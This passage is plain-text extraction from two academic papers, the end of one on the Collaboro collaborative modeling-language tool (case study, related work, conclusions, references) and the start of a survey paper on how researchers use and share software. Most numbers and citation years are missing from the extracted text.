current setting used by the project so far. in particular, to be able to use collaboro for managing the addl-ba language definition process we needed to import: ( ) previous discussions stored in the wiki-based platform and ( ) the current concrete syntaxes of the aadl and aadl-ba language defined in xtext and antlr respectively (the abstract syntax was already defined as an emf model so it could be directly imported into collaboro). it was also clear that to simplify the use of the tool, we had to provide a web interface since it would be too complex for the members of cánovas izquierdo and cabot ( ), peerj comput. sci., doi . /peerj-cs. / http://www.aadl.info http://penelope.enst.fr/aadl/wiki/projects#aadl-ba-fronten http://penelope.enst.fr/aadl/wiki/projects#aadl-ba-fronten http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the aadl community to install an eclipse environment just for the purpose of discussing around language issues. in the end, time constraints prevented us to test the tool with aadl community at large (the aadl-ba committee meets at fixed dates and we did create a web-based interface but could not get a new version of the tool with all the scripts required to import the legacy data on time), but the private iterations with the aadl-ba developer and his validation and positive feedback helped us a lot to improve collaboro and learn more about the challenges of using collaboro as a part of an ongoing language development effort. we are still in contact with this community and we will see if we can complete the test in the future or reach out other similar standardization committees. lessons learned the development of the previous case studies provided us with some useful insights on the collaboro process that since then have been integrated in our approach. for instance, in the first and second case studies, it turned out that conflicting proposals were frequent and therefore we added a conflicting relationship information explicitly in the collaboration metamodel so that once one of them was accepted we could automatically shut down the related ones. we also noted an intensive use of comments (easier to add) in comparison with proposals and solutions. this fact together with the discussions on what should constitute a new version and when to end the discussions (e.g., what if there was unanimity but not everybody had voted, should we wait for that person? for how long?) helped us to realize the importance of an explicit community manager role in charge of making sure the collaboration is always fluid and there are no bottlenecks or deadlocks. during the development of the three case studies, concurrent access to the models turned out to be a must as well since most of the time collaborations overlapped at some point. the experience gathered during the development of the first case study, where the collaboration was performed only in the eclipse-based plugin, and later the requirements of the second and third case studies allowed us to provide a second front-end for the approach based on a web-client. thus, the web-enabled support was crucial to allow all the developers to contribute and visualize how the metamodels evolved during the collaboration. in all the case studies the notation view allowed the participants to quickly validate the concrete syntax. this is specially important since for non-technical users it is easier to discuss at the concrete syntax level than at the abstract level. the only common complaint we got was regarding the limited support for voting (mainly raised in the first case study but also raised in the others), where participants reported that they would have preferred more options instead of just a boolean yes/no option. note that this would have a non negligible impact on the decision algorithms that would need to be adapted to consider the new voting options. we plan to incorporate extra support to define how to make decisions, in a similar way as proposed in cánovas izquierdo & cabot ( ). cánovas izquierdo and cabot ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ related work end-user involvement is a core feature of several software development methods (such as agile-based ones). the concept of community-driven development of a software product was introduced by hess, offenberg & pipek ( ) and other authors have studied this collaboration as part of the requirement elicitation (mylopoulos, chung & yu, ), ontology development (leenheer, ; siorpaes, ) and modeling phases of the software (hildenbrand et al., ; lanubile et al., ; whitehead, ; rittgen, ), but neither of them focuses on the dsml language design process nor they present the collaboration as a process of discussion, voting and argumentation from the beginning to the end of the language development process. end-user participation is also the core of user-centered design (norman & draper, ), initially focused on the design of user interfaces but lately applied to other domains (e.g., agile methodologies (hussain, slany & holzinger, ) or web development (troyer & leune, )). again, none of these approaches can be directly applied to the specification of a dsml. nevertheless, ideas from these papers have indeed influenced the collaboro process. regarding specific approaches around collaboration in dsml development, some works propose to derive a first dsml definition by means of user demonstrations (cho, gray & syriani, ; kuhrmann, ; sánchez cuadrado, de lara & guerra, ; lópez-fernández et al., ) or grammar inference techniques (javed et al., ; liu et al., ), where example models are analyzed to derive the metamodel of the language. however, these approaches do not include any discussion phase nor validation of the generated metamodel with the end-users. in this sense, our approaches could complement each other, theirs could be used to create an initial metamodel from which to trigger the refinement process based on the discussions among the different users (cánovas izquierdo et al., ). subsets of our proposal can also be linked to: i) specific tools for model versioning (e.g., amor repository (http://www.modelversioning.org) and altmanninger, seidl & wimmer ( )) that have already proposed a taxonomy of metamodel changes, ii) online-collaboration (brosch et al., ; gallardo, bravo & redondo, ) promoting synchronous collaboration among developers, iii) metamodel-centric language definition approaches (scheidgen, ; prinz, scheidgen & tveit, ) where the concrete syntax is considered at the same level as the abstract one and iv) collaboration protocols (gallardo et al., ). in all cases, collaboro extends the contributions of those tools with explicit collaboration and justification constructs, and provides as well the possibility of offline collaborations and a more formal representation of the interactions (e.g., voting system, explicit argumentation and rationale, traceability). the agreed dsml definition at the end of the collaboro process could be then the input of the complete dsml modeling environment aimed by some of the tools mentioned above. regarding the recommender engine and the calculation of metrics for dsmls, we can identify works centered on assessing the quality of both the abstract and concrete syntaxes, and the main features of the language (e.g., reusability, integrability or compatibility). there are several works providing metrics to check the quality in cánovas izquierdo and cabot ( ), peerj comput. sci., doi . /peerj-cs. / http://www.modelversioning.org http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ metamodels (cho & gray, ; aguilera, gómez & olivé, ) and in the notation used for textual dsmls (power & malloy, ; črepinšek et al., ). with regard to graphical dsmls, moody’s principles (moody, ) have emerged as the predominant theoretical paradigm. originally based on the cognitive dimensions framework (blackwell et al., ; green, ; green & petre, ), moody’s principles address their theoretical and practical limitations. while these principles provide a framework to evaluate visual notations, other works have put them into practice by analyzing dsmls (genon, amyot & heymans, a; genon, heymans & amyot, b; moody & van hillegersberg, ; le pallec & dupuy-chessa, ) or complement the use of moody’s principles with polls (figl et al., ) also, thus allowing end-user feedback and involvement during the design process of a visual notation. however, the previous works are usually centered to specific dsmls and do not provide mechanisms to be calculated to any dsml as our approach addresses. other works such as (kahraman & bilgen, ) propose an evaluation framework focused on language features and therefore not particularly analyzing the quality from an end-user perspective. to the best of our knowledge, ours is the first proposal to generically assess the cognitive quality of dsmls under development. finally, the representation of the collaboration rationale is related to the area of requirements negotiation, argumentation and justification approaches such as the work presented by jureta, faulkner & schobbens ( ). the decision algorithms proposed in those works could be integrated in our decision engine. other decision engines such as caslo (padrón, dodero & lanchas, ) or hermes (karacapilidis & papadias, ) could also be used. conclusions we have presented collaboro, a dsml to enable the participation of all members of a community in the specification of a new domain-specific language or in the creation of new models. collaboro allows representing (and tracking) language change proposals, solutions and comments for both the abstract and concrete syntaxes of the language. this information can then be used to justify the design decisions taken during the definition or use of the modeling language. the approach provides two front-ends (i.e., eclipse-based and web-based ones) to facilitate its usage and also incorporates a recommender system which checks the quality of the dsml under development. once the community reaches an agreement on the language features, our collaboro model could be later used as input to language workbenches in order to automatically create the dsl tooling (i.e., editors, parsers, palettes, repositories, etc.) needed to start using the language in practice. for instance, it would be possible to automatically create the configuration files required for xtext (for textual languages) or gmf (for graphical ones) from our notation and abstract syntax models. as further work, we plan to extend our notation metamodel (and the renderer) to support richer concrete syntax definitions (e.g., incorporating the concept of anchor to specify how to represent the source/target connections for links in graphical languages). cánovas izquierdo and cabot ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ these extensions should be defined as pluggable extensions to allow designers import them in the definition of languages where it is foreseen those additional concepts may be needed. we also find interesting to use our recommender system on existing (popular) languages as a way to assess the “quality” of such languages and, potentially, suggest changes to improve them. furthermore, we would like to explore how to support the collaborative definition of the well-formed rules (e.g., ocl constraints) for the dsml under development. as these rules are normally expressed by using a (semi)formal textual language (like ocl), the challenge is how to discuss them in a way that non-technical experts can understand and participate. finally, we are also exploring how to better encourage end-user participation (e.g., by applying gamification techniques) to make sure the process is as plural as possible. this could be tried as part of a new experiment in an educational setting at our institution (universitat oberta de catalunya (uoc): www.uoc. edu) with the (virtual) students in our software engineering master degree. additional information and declarations funding javier luis cánovas izquierdo benefited from two postdoctoral fellowships grants by inria and in -uoc during the realization of this work. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: inria and in -uoc. competing interests the authors declare that they have no competing interests. author contributions � javier luis cánovas izquierdo conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. � jordi cabot conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. data deposition the following information was supplied regarding data availability: github: https://github.com/som-research/collaboro. cánovas izquierdo and cabot ( ), peerj comput. sci., doi . /peerj-cs. / http://www.uoc.edu http://www.uoc.edu https://github.com/som-research/collaboro http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ references aguilera d, gómez c, olivé a. . a method for the definition and treatment of conceptual schema quality issues. in: international conference on conceptual modeling. vol. . berlin, heidelberg: springer, – . altmanninger k, seidl m, wimmer m. . a survey on model versioning approaches. international journal of web information systems ( ): – doi . / . bariši�c a, amaral v, goulão m, barroca b. . evaluating the usability of domain-specific languages. in: formal and practical aspects of domain-specific languages: recent developments, – . available at http://www.igi-global.com/chapter/evaluating-usability-domain-specific- languages/ . blackwell af, britton c, cox al, green trg, gurr ca, kadoda gf, kutar m, loomes m, nehaniv cl, petre m, roast c, roe c, wong a, young rm. . cognitive dimensions of notations: design tools for cognitive technology. in: international conference on cognitive technology, coventry, – . brosch p, seidl m, wieland k, wimmer m, langer p. . we can work it out: collaborative conflict resolution in model versioning. in: european conference on computer supported cooperative work. london: springer, – . cabot j, wilson g. . tools for teams: a survey of web-based software project portals. available at http://www.drdobbs.com/tools/tools-for-teams-a-survey-of-web-based-so/ . cánovas izquierdo jl, cabot j. . enabling the collaborative definition of dsmls. in: international conference on advanced information systems engineering, valencia, – . cánovas izquierdo jl, cabot j. . enabling the definition and enforcement of governance rules in open source systems. in: international conference on software engineering. piscataway: ieee press, – . cánovas izquierdo jl, cabot j, lópez-fernández jj, sánchez cuadrado j, guerra e, de lara j. . engaging end-users in the collaborative development of domain-specific modelling languages. in: international conference on cooperative design, visualization, and engineering, alcudia, mallorca, – . cho h, gray j. . design patterns for metamodels. in: conference on systems, programming, and applications: software for humanity–colocated workshop. new york: acm, – . cho h, gray j, syriani e. . creating visual domain-specific modeling languages from end-user demonstration. in: international workshop on modeling in software engineering. piscataway: ieee press, – . črepinšek m, kosar t, mernik m, cervelle j, forax r, rousse g. . on automata and language based grammar metrics. computer science and information systems ( ): – doi . /csis c. dullemond k, van gameren b, van solingen r. . collaboration spaces for virtual software teams. ieee software ( ): – doi . /ms. . . figl k, derntl m, rodrı́guez mc, botturi l. . cognitive effectiveness of visual instructional design languages. journal of visual languages & computing ( ): – doi . /j.jvlc. . . . gabriel p, goulão m, amaral v. . do software languages engineers evaluate their languages? congreso iberoamericano en software engineering, cuenca, – . gallardo j, bravo c, redondo ma. . a model-driven development method for collaborative modeling tools. journal of network and computer applications ( ): – doi . /j.jnca. . . . cánovas izquierdo and cabot ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / http://www.igi-global.com/chapter/evaluating-usability-domain-specific-languages/ http://www.igi-global.com/chapter/evaluating-usability-domain-specific-languages/ http://www.drdobbs.com/tools/tools-for-teams-a-survey-of-web-based-so/ http://dx.doi.org/ . /csis c http://dx.doi.org/ . /ms. . http://dx.doi.org/ . /j.jvlc. . . http://dx.doi.org/ . /j.jnca. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ gallardo j, bravo c, redondo ma, de lara j. . modeling collaboration protocols for collaborative modeling tools: experiences and applications. journal of visual languages & computing ( ): – doi . /j.jvlc. . . . genon n, amyot d, heymans p. a. analysing the cognitive effectiveness of the ucm visual notation. in: international workshop on system analysis and modeling, oslo, – . genon n, heymans p, amyot d. b. analysing the cognitive effectiveness of the bpmn . visual notation. in: international conference on software language engineering, eindhoven, – . green trg. . cognitive dimensions of notations. in: sutcliffe a, macaulay l, eds. people and computers. vol. . cambridge: cambridge university press, – . green trg, petre m. . usability analysis of visual programming environments: a cognitive dimensions framework. journal of visual languages & computing ( ): – doi . /jvlc. . . grundy jc, hosking j, li kn, ali nm, huh j, li rl. . generating domain-specific visual language tools from abstract visual specifications. ieee transactions on software engineering ( ): – doi . /tse. . . hatton l, van genuchten m. . early design decisions. ieee software ( ): – doi . /ms. . . hess j, offenberg s, pipek v. . community driven development as participation? involving user communities in a software design process. in: conference on participatory design. indianapolis: indiana university, – . hildenbrand t, rothlauf f, geisser m, heinzl a, kude t. . approaches to collaborative software development. in: conference on complex, intelligent and software intensive systems. piscataway: ieee, – . hussain z, slany w, holzinger a. . current state of agile user-centered design: a survey. in: symposium of the workgroup human-computer interaction and usability engineering of the austrian computer society–hci and usability for e-inclusion, linz. vol. . – . javed f, mernik m, gray j, bryant br. . mars: a metamodel recovery system using grammar inference. information and software technology ( – ): – doi . /j.infsof. . . . jureta ij, faulkner s, schobbens p-y. . clear justification of modeling decisions for goal-oriented requirements engineering. requirements engineering ( ): – doi . /s - - -y. kahraman g, bilgen s. . a framework for qualitative assessment of domain-specific languages. software & system modeling ( ): – doi . /s - - - . karacapilidis ni, papadias d. . computer supported argumentation and collaborative decision making: the hermes system. information systems ( ): – doi . /s - ( ) - . kelly s, pohjonen r. . worst practices for domain-specific modeling. ieee software ( ): – doi . /ms. . . kleppe a. . software language engineering: creating domain-specific languages using metamodels. boston: addison wesley. kuhrmann m. . user assistance during domain-specific language design. in: flexitools workshop, waikiki, honolulu. lanubile f, ebert c, prikladnicki r, vizcaı́no a. . collaboration tools for global software engineering. ieee software ( ): – doi . /ms. . . cánovas izquierdo and cabot ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.jvlc. . . http://dx.doi.org/ . /jvlc. . http://dx.doi.org/ . /tse. . http://dx.doi.org/ . /ms. . http://dx.doi.org/ . /j.infsof. . . http://dx.doi.org/ . /s - - -y http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /ms. . http://dx.doi.org/ . /ms. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ le pallec x, dupuy-chessa s. . support for quality metrics in metamodelling. in: workshop on graphical modeling language development. new york: acm, – . leenheer pd. . on community-based ontology evolution. phd thesis, belgium: vrije universiteit brussel. available at https://d so lpcz yn .cloudfront.net/sites/vub/files/ a.pdf. liu q, gray j, mernik m, bryant br. . application of metamodel inference with large-scale metamodels. international journal of software and informatics ( ): – . lópez-fernández jj, sánchez cuadrado j, guerra e, de lara j. . example-driven meta-model development. software & systems modeling ( ): – doi . /s - - -y. mernik m, heering j, sloane am. . when and how to develop domain-specific languages. acm computing surveys ( ): – doi . / . miller ga. . the magical number seven, plus or minus two: some limits on our capacity for processing information. psychological review ( ): – doi . /h . moody dl. . the physics of notations: toward a scientific basis for constructing visual notations in software engineering. ieee transactions on software engineering ( ): – doi . /tse. . . moody dl, van hillegersberg j. . evaluating the visual syntax of uml: an analysis of the cognitive effectiveness of the uml family of diagrams. in: conference on software language engineering, toulouse, – . mylopoulos j, chung l, yu esk. . from object-oriented to goal-oriented requirements analysis. communications of the acm ( ): – doi . / . . norman da, draper sw. . user centered system design: new perspectives on human- computer interaction. hillsdale: l. erlbaum associates inc. object management group (omg). a. model-driven architecture (mda) specification. available at http://www.omg.org/mda/specs.htm (accessed may ). object management group (omg). b. object constraint language (ocl) specification. version . . available at http://www.omg.org/spec/ocl (accessed may ). object management group (omg). a. diagram definition (dd) specification. version . . available at http://www.omg.org/spec/dd (accessed may ). object management group (omg). b. meta object facility core (mof) specification. version . . available at http://www.omg.org/spec/mof/ . (accessed may ). padrón cl, dodero jm, lanchas j. . caslo: collaborative annotation service for learning objects. learning technology newsletter ( ): – . power jf, malloy ba. . a metrics suite for grammar-based software. journal of software maintenance and evolution: research and practice ( ): – doi . /smr. . prinz a, scheidgen m, tveit ms. . a model-based standard for sdl. in: international sdl forum, paris, – . rittgen p. . coma: a tool for collaborative modeling. in: forum at the international conference on advanced information systems engineering, montpellier, – . rooksby j, ikeya n. . collaboration in formative design: working together. ieee software ( ): – doi . /ms. . . sánchez cuadrado j, de lara j, guerra e. . bottom-up meta-modelling: an interactive approach. in: conference on model driven engineering languages and systems, innsbruck, – . sánchez cuadrado j, garcı́a molina j. . building domain-specific languages for model-driven development. ieee software ( ): – . cánovas izquierdo and cabot ( ), peerj comput. sci., doi . /peerj-cs. / https://d so lpcz yn .cloudfront.net/sites/vub/files/ a.pdf https://d so lpcz yn .cloudfront.net/sites/vub/files/ a.pdf http://dx.doi.org/ . /s - - -y http://dx.doi.org/ . / http://dx.doi.org/ . /h http://dx.doi.org/ . /tse. . http://dx.doi.org/ . / . http://www.omg.org/mda/specs.htm http://www.omg.org/spec/ocl http://www.omg.org/spec/dd http://www.omg.org/spec/mof/ . http://dx.doi.org/ . /smr. http://dx.doi.org/ . /ms. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ scheidgen m. . textual modelling embedded into graphical modelling. in: european conference on model driven architecture–foundations and applications, berlin. vol. , – . siorpaes k. . lightweight community-driven ontology evolution. in: international semantic web conference, busan. vol. , – . steinberg d, budinsky f, paternostro m, merks e. . emf: eclipse modeling framework. boston: addison wesley. svg. . scalable vector graphics . . available at http://www.w .org/tr/svg/. tamburri da, lago p, vliet hv. . organizational social structures for software engineering. acm computing surveys ( ): – doi . / . . troyer od, leune cj. . wsdm: a user centered design method for web sites. computer networks ( – ): – . völter m. . md�/dsl best practices. available at http://voelter.de/data/pub/dslbestpractices- update.pdf (accessed may ). whitehead j. . collaboration in software engineering: a roadmap. in: workshop on the future of software engineering. piscataway: ieee computer society, – . cánovas izquierdo and cabot ( ), peerj comput. sci., doi . /peerj-cs. / http://www.w .org/tr/svg/ http://dx.doi.org/ . / . http://voelter.de/data/pub/dslbestpractices- update.pdf http://voelter.de/data/pub/dslbestpractices- update.pdf https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. collaboro: a collaborative (meta) modeling tool introduction collaborative (meta) modeling making dsml development collaborative collaborative modeling tool support application scenarios related work conclusions references towards computational reproducibility: researcher perspectives on the use and sharing of software a peer-reviewed version of this preprint was published in peerj on september . view the peer-reviewed version (peerj.com/articles/cs- ), which is the preferred citable publication unless you specifically need to cite this preprint. alnoamany y, borghi ja. . towards computational reproducibility: researcher perspectives on the use and sharing of software. peerj computer science :e https://doi.org/ . /peerj-cs. https://doi.org/ . /peerj-cs. https://doi.org/ . /peerj-cs. towards computational reproducibility: researcher perspectives on the use and sharing of software yasmin alnoamany corresp., , john a. borghi university of california, berkeley, united states california digital library corresponding author: yasmin alnoamany email address: yasminal@berkeley.edu research software, which includes both the source code and executables used as part of the research process, presents a significant challenge for efforts aimed at ensuring reproducibility. in order to inform such efforts, we conducted a survey to better understand the characteristics of research software as well as how it is created, used, and shared by researchers. based on the responses of participants, representing a range of research disciplines, we found that researchers create, use, and share software in a wide variety of forms for a wide variety of purposes, including data collection, data analysis, data visualization, data cleaning and organization, and automation. more participants indicated that they use open source software than commercial software. while a relatively small number of programming languages (e.g. python, r, javascript, c++, matlab) are used by a large number, there is a long tail of languages used by relatively few. between group comparisons revealed that significantly more participants from computer science write source code and create executables than participants from other disciplines. group comparisons related to knowledge of best practices related to software creation or sharing were not significant. while many participants indicated that they draw a distinction between the sharing and preservation of software, related practices and perceptions were often not aligned with those of the broader scholarly communications community. peerj preprints | https://doi.org/ . /peerj.preprints. v | cc by . open access | rec: mar , publ: mar towards computational reproducibility: researcher perspectives on the use and sharing of software yasmin alnoamany and john a. borghi university of california, berkeley california digital library corresponding author: yasmin alnoamany email address: yasminal@berkeley.edu abstract research software, which includes both the source code and executables used as part of the research process, presents a significant challenge for efforts aimed at ensuring reproducibility. in order to inform such efforts, we conducted a survey to better understand the characteristics of research software as well as how it is created, used, and shared by researchers. based on the responses of participants, representing a range of research disciplines, we found that researchers create, use, and share software in a wide variety of forms for a wide variety of purposes, including data collection, data analysis, data visualization, data cleaning and organization, and automation. more participants indicated that they use open source software than commercial software. while a relatively small number of programming languages (e.g. python, r, javascript, c++, matlab) are used by a large number, there is a long tail of languages used by relatively few. between group comparisons revealed that significantly more participants from computer science write source code and create executables than participants from other disciplines. group comparisons related to knowledge of best practices related to software creation or sharing were not significant. while many participants indicated that they draw a distinction between the sharing and preservation of software, related practices and perceptions were often not aligned with those of the broader scholarly communications community. introduction research software is a important consideration when addressing concerns related to reproducibility (hong ( ); hong ( ); stodden et al. ( ); goble ( )). effective management and sharing of software saves time, increases transparency, and advances science (prlić and procter ( )). at present, there are several converging efforts to ensure that software is positioned as a “first class” research object that is maintained, assessed, and cited in a similar fashion as scholarly publications (e.g. nih ( ); katz et al. ( ); ram et al. ( ); crouch et al. ( )). however, while there is a burgeoning literature exploring the actives of researchers in relation to materials like data (tenopir et al. ( ); tenopir et al. ( ); monteith et al. ( ); kim and stanton ( )), those related to software have received less attention. specifically, we have been unable to find a study that thoroughly examines how researchers use, share and value their software. in this paper we report the results of a survey designed to capture researcher practices and perceptions related to software. survey questions addressed a variety of topics including: . what are the characteristics of research software? . how do researchers use software? . to what extent do current practices related to software align with those related to reproducibility? . how do researchers share software? . how do researchers preserve software? after filtering, researchers participated in our survey. overall, our results demonstrate that researchers create software using a wide variety of programming languages, use software for a wide variety of purposes, have adopted some- but not all- practices recommended to address reproducibility, often share software outside of traditional scholarly communication channels, and generally do not actively preserve their software. participants from computer science reported that they write source code and create executables significantly more than participants from other disciplines. however, other group comparisons largely did not reach statistical significance. in the following sections, we provide a more detailed description of our findings. we start with an overview of the related literature (section ) then a description of our survey instrument and the demographic characteristics of our participants (section ; section ). in section , we describe our findings related to the characteristics of research software and its usage. responses to questions involving reproducibility-related practices are detailed in section . section outlines the responses to questions related to software sharing and preservation. we discuss the implications of our findings in section . finally, section contains a discussion of future work. related work while there is an emerging body of research examining researcher practices, perceptions, and priorities for products like data (fecher et al. ( ); kratz and strasser ( ); tenopir et al. ( ); tenopir et al. ( )), work related to software has generally focused on how it is found, adopted, and credited (howison and bullard ( b); hucka and graham ( ); joppa et al. ( )). for example, research examining the re-use of software demonstrates that the most common difficulty for users looking for software is a lack of documentation and that finding software is a difficult task even within technology companies (sadowski et al. ( )). however, as software is increasingly central to the research process (borgman et al. ( )), understanding its characteristics, its use, and the related practices and perceptions of researchers is an essential component of addressing reproducibility. the term “reproducibility” has been applied to a variety of efforts aimed at addressing the misalignment between good research practices, including those emphasizing transparency and methodological rigor, and the academic reward system, which generally emphasizes the publication of novel and positive results (nosek et al. ( ); munafò et al. ( )). attempts to provide a cohesive lexicon for describing reproducibility-related activities are described elsewhere (goodman et al. ( )) but computational reproducibility generally refers to the description and sharing of software tools and data in such a manner as to enable their use and evaluation by others (stodden et al. ( )). efforts aimed at fostering computational reproducibility are often focused on the sharing of source code but may also include the establishment of best practice guidelines related to how software tools are described, cited, and licensed (e.g. stodden et al. ( )). because of the costs of irreproducibility, there have been numerous calls urging researchers to more thoroughly describe and share their software (barnes ( ); ince et al. ( ); joppa et al. ( ); morin et al. ( a)). such calls are increasingly backed by mandates from funding agencies. for example, the wellcome trust now expects that grant recipients make available “any original software that is required to view datasets or to replicate analyses” (wellcome ( )). in parallel, a myriad of guidelines, tools, and organizations have emerged to help researchers address issues related to their software. software-related best practices have been outlined for both individuals working in specific research disciplines (eglen et al. ( ); marwick ( )) and for the research community in general (e.g. piccolo and frampton ( ); sandve et al. ( ); jimenez et al. ( )). literate programming tools such as jupyter notebooks (perez and granger ( )) allow researchers to combine data, code, comments, and outputs (e.g., figures and tables) in a human-readable fashion, while packaging and containerization platforms such as reprozip (chirigati et al. ( )) and docker (boettiger ( )) enable the tracking, bundling, and sharing of all of the software libraries and dependencies associated with a research project. through their integration with github (https://github.com/), services like figshare (https://figshare.com/) and zenodo (https://zenodo.org/) allow researchers to deposit, archive, and receive persistent identifiers for their software. training researchers to better develop, use, and maintain software tools is the primary focus of community organizations including the carpentries (wilson ( ); teal et al. ( )) and the software sustainability institute (crouch / et al. ( )) while scholarly communications-focused organizations such as force have published guidelines for describing and citing software (smith et al. ( )). as is evident in the above description, reproducibility-related efforts involving software often, but not always, overlap with those related to data. however, software presents a number of unique challenges compared to data and other research products. even defining the bounds of the term “software” is challenging. for example, the national institute of standards and technology (nist) defines software as “computer programs and associated data that may be dynamically written or modified during execution.” (kissel et al. ( )), a definition that is as recursive as it is potentially confusing for researchers without a background in computer science or software development. software involves highly interdependent source and binary components that are sensitive to changes in operating environment and are difficult to track (thain et al. ( )). evaluating the validity and reliability of software often requires inspecting source code, which is not possible when proprietary licenses are applied (morin et al. ( b); stodden ( )). even when source code is technically available, important information about versions, parameters, and runtime environments is often missing from the scholarly record (howison and bullard ( b); pan et al. ( ); stodden et al. ( )). seemingly small alterations, even for well described and openly available software tools, can lead to significant effects on analytical outputs (mccarthy et al. ( )), a problem exacerbated by the fact that researchers often have minimal formal training in software development practices (hannay et al. ( ); joppa et al. ( ); prabhu et al. ( )). the iterative and collaborative nature of software development also means that it does not fit easily within existing academic incentive structures (hafer and kirkpatrick ( ); howison and herbsleb ( ); howison and herbsleb ( )). research software is a growing concern for research service providers, including those affiliated with academic institutions. often through workshops facilitated by the carpentries, many have begun to provide guidance and training to researchers looking to create and use software tools. services related to the preservation of software have also been explored by some academic libraries (e.g. rios ( )). however, these activities remain relatively nascent and it is presently unclear what a mature set of services related to research software and computational reproducibility might look like. by identifying the characteristics or research software, its uses, and elucidating the related practices and perceptions of researchers, we hope to establish a benchmark that can be applied to inform the development of such services in the future. methods in order to understand researcher practices and perceptions related to software and computational repro- ducibility, we designed and disseminated an online survey via the qualtrics platform (www.qualtrics. com). the survey was advertised through blog posts, social media, and research-related email lists and listservs. because the survey was distributed using different communication channels, we could not calculate the response rate. in section , we detail the demographics of the survey’s participants. all study materials and procedures were approved by the university of california berkeley committee for protection of human subjects and office for the protection of human subjects (protocol id - - ). the full text of the survey can be found in the supplementary materials. before beginning the survey, participants were required to read and give their informed consent to participate. after reading the informed consent form (see survey), participants indicated their consent by checking a box. information from participants who did not check this box was removed from all subsequent analyses. an anonymized version of our survey results (alnoamany and borghi ( a)) as well as the code we used for its analysis (alnoamany and borghi ( b)) are also available on github (https://github.com/yasmina /swcuration). . survey design the survey was developed to capture a broad range of information about how researchers use, share, and value their software. the final survey instrument consisted of questions ( multiple choices, open response), divided into four sections. in order, the sections focused on: . demographics: included questions related the participant’s research discipline, role, degree, age, institution, and funding sources ( questions) . characteristics of research software: included questions related to how the participants use software and the characteristics of their software ( questions). / . software sharing practices: included questions related to how participants make their software available to others ( questions). . how researchers assign value to software ( questions). because only sections and addressed topics related to computational reproducibility, this paper is focused on responses to questions in the first three questions. future work will further delineate how researchers value software. we hypothesized that study participants would come to our survey with different levels of knowledge about software development practices and terminology. therefore, we included a brief list of definitions in our survey for terms like “source code”, “executable”, and “open source software” that participants could refer back to at any time. participants were not required to answer every question in order to proceed through the survey. . filtering and exclusion criteria we collected responses to an online survey of software usage and sharing practices and perceptions from late january to early april of . we excluded participants who started the survey but did not answer questions beyond the demographic section to have unique responses. though the majority of our participants indicated that they were from academia (table ), we did not exclude any participant due to institution type because of the possibility that participants could be affiliated with an academic or research program while conducting work in another sector. institution names and disciplines were canonicalized (e.g. ucb and uc berkeley were mapped to uc berkeley). table . demographic breakdown for study participants. discipline count percentage institution count percentage computer science . % academic: research focused . % biology . % academic: teaching focused . % psychology . % government . % engineering . % nonprofit . % interdisciplinary programs . % academic: medical school . % mathematics . % commercial . % physics . % other . % earth science . % role count percentage library sciences . % graduate student . % social sciences . % postdoc . % others . % research faculty . % highest degree count percentage staff . % doctorate . % principal investigator . % masters . % research assistant . % bachelors . % undergraduate student . % high school . % research . % professional degree . % other . % participant demographics we asked participants about their age, professional degrees, professional title (or role) and institutional affiliation, institution type, and the sources of funding. the majority of these questions were multiple choice with an option for open response upon selecting “other”. the mean and median age of our participants were . and years old, respectively. reflecting the ubiquity of software within the research enterprise, participants were drawn from a wide variety of research disciplines, institution types, and roles. as shown in table , the disciplines most represented in our sample were computer science, biology, and psychology. the majority of our participants were drawn from different research-focused academic institutions (including % out of researchers from uc berkeley). table also shows that participants had a range of degrees and roles, with the most common being doctorate ( . %, n = ) and graduate student ( . %, n = ), respectively. in terms of funding, the most common responses were the national science foundation (nsf) ( . %, n = ) and the national institutes of health ( . %, n = ). / characteristics and use of research software before diving deeper into how researchers use their software, we wanted to identify its characteristics. in this section, we describe responses to questions related to the creation and use of source code and executables. . source code and executables we asked participants about the generation and use of source code and executables (i.e. do you write source code?, do you use source code written by others?, do you create executables?, do you use executables created by others?). we found that . % out of responding participants write source code and . % out of use source code written by others while . % out of create executables and . % use executables written by others. figure shows that participants from computer science were significantly more likely to write source code [χ ( ,n = ) = . , p < . ], create executables [χ ( ,n = ) = . , p < . ], and use executables created by others [χ ( ,n = ) = . , p < . ] than participants from other disciplines. comparisons related to the use of others’ source code did not reach statistical significance [χ ( ,n = ) = . , p = . ]. we also asked participants about the type of software they use (i.e. do you use commercial software in the course of your research? do you use open source software in the course of your research?). as shown in figure more participants indicated that they use open source software ( . %, n = ) than commercial software ( . %, n = ). . programming languages in order to quantify the breadth of programming languages used in a research setting, we asked participants about the languages they use when writing their own code. table shows the top ten languages, which together account for . % of languages selected. the top used languages in our sample were python, r, javascript, c++, matlab, java, c, php, and perl. python and r were the most used languages, selected by . % and . % of participants of respectively. for the most part, these results are in line with previous findings from hucka and garaham (hucka and graham ( )) and also match those of a recent study from stack overflow (inc. ( )). in total, different languages were chosen, with the most common responses outside of the top ten being ruby, c#, asp, sas, xml, xquery, and julia. quantitatively measuring the use programming languages in academic research is difficult due to the variability of reporting practices (howison and bullard ( a)), but our results are largely in line the rapid ascent of r and python as tools for data science. table . the top programming languages used by the researchers in our sample. a total of participants answered this question. together these languages represent . % of the languages selected. note that participants could choose more than one language. language python r sql javascript c++ matlab java c php perl selection percentage . % . % . % . % . % . % . % . % . % . % we also inquired about collaborative code development and the extent to which the same programming languages are used within a lab or a research group. though . % of participants indicated that they write code collaboratively, we were surprised to see that only 